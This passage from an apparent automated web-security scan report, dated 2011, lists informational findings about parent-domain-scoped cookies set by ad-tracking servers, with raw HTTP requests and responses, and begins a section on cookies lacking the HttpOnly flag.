Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315189882; expires=Wed, 05-Oct-2011 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315189882_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.5_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Tue, 04-Sep-2012 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.5_354.deleted_785354.deleted_63.deleted_78563.deleted; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.84. http://vap2den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap2den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&referer=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&cb=3701643a83 HTTP/1.1
Host: vap2den1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.45924899890087545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315189882; OACAP=785.5; OASCAP=785.5

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315189886; expires=Wed, 05-Oct-2011 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315189886_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.2_354.0_785354.0_63.0_78563.0; expires=Tue, 04-Sep-2012 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.2_354.0_785354.0_63.0_78563.0; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.85. http://vap2iad1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap2iad1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_target&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_target&cb=7d49486027 HTTP/1.1
Host: vap2iad1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.5322077
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315190046; OACAP=785.9; OASCAP=785.9

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:32:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315189946; expires=Wed, 05-Oct-2011 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315190065_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.10_354.1_785354.1_63.0_78563.0; expires=Tue, 04-Sep-2012 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.10_354.1_785354.1_63.0_78563.0; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.86. http://vap3den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap3den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_name&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_name&cb=330ba953d8 HTTP/1.1
Host: vap3den1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.4732172
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315190041; OACAP=785.8; OASCAP=785.8

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315190047; expires=Wed, 05-Oct-2011 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c354ad2131feae750e42ecbeb; expires=Tue, 04-Sep-2012 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315190046_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.1_354.0_785354.0_63.0_78563.0; expires=Tue, 04-Sep-2012 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.7_354.1_785354.1_63.0_78563.0; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.87. http://www.imiclk.com/cgi/r.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=882Mb6AW&ptid=SRCH&sp=1 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.imiclk.com
Proxy-Connection: Keep-Alive
Cookie: OL8U=2-2-EF9B2A41DEF04F554DFEEE4881CDD96250BB8C439E5A250BACD1DD240C3E3E28-5B1171855FEBF9CA53EEC5CED3CC3B0B370C44EC2ADA7505A2A1FD8460D4D0D5; CH=30299,00000,28363,5djP6,30298,00000,36978,00000,30330,00000,22243,5djP6,31534,5djP6,31482,5djP6,31481,5djP6,30300,00000,32009,00000,32008,00000,30301,00000; YU=36bc66c588b6d76f9e5bf1dc0fc95649-5djP6

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Location: http://ad.yieldmanager.com/pixel?adv=5787&t=2&id=717449&id=717450&code=bgy;cyp;i43;czl;A2b;dx1;dvk;cyr;ea8;dvg;ea7;ab50;cyq;dvl;cys
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 21:13:42 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: CH=30299,00000,28363,5djP6,30298,00000,36978,00000,30330,00000,22243,5djP6,31534,5i91q,31482,5i91q,31481,5i91q,30300,00000,32009,00000,31477,00000,32008,00000,30301,00000; domain=.imiclk.com; path=/; expires=Mon, 03-Sep-2012 21:02:53 GMT
Set-Cookie: YU=f913638726d2c3d0729f66d3451f466d-5i91q; domain=.imiclk.com; path=/; expires=Mon, 03-Sep-2012 21:02:53 GMT
Content-Length: 13

<html></html>

10.88. http://www.lijit.com/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon?viewId=13151898886726b8b8a1ec2f8&rand=1315189888672&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_formattext&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_formattext&ifr=1&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.1755792
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n10 ( lax-agg-n21), ms lax-agg-n21 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 05 Sep 2011 02:30:51 GMT
Content-Length: 635
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; expires=Wed, 04-Sep-2013 02:30:51 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
                   <img src="http://ad.turn.com/server/pixel.htm?fpid=13&r=149046210" style="width:0px; height:0px;" width="0" height="0" />
                   <img src="http://um
...[SNIP]...

11. Cookie without HttpOnly flag set  previous  next
There are 127 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://afe.specificclick.net/  previous  next

Summary
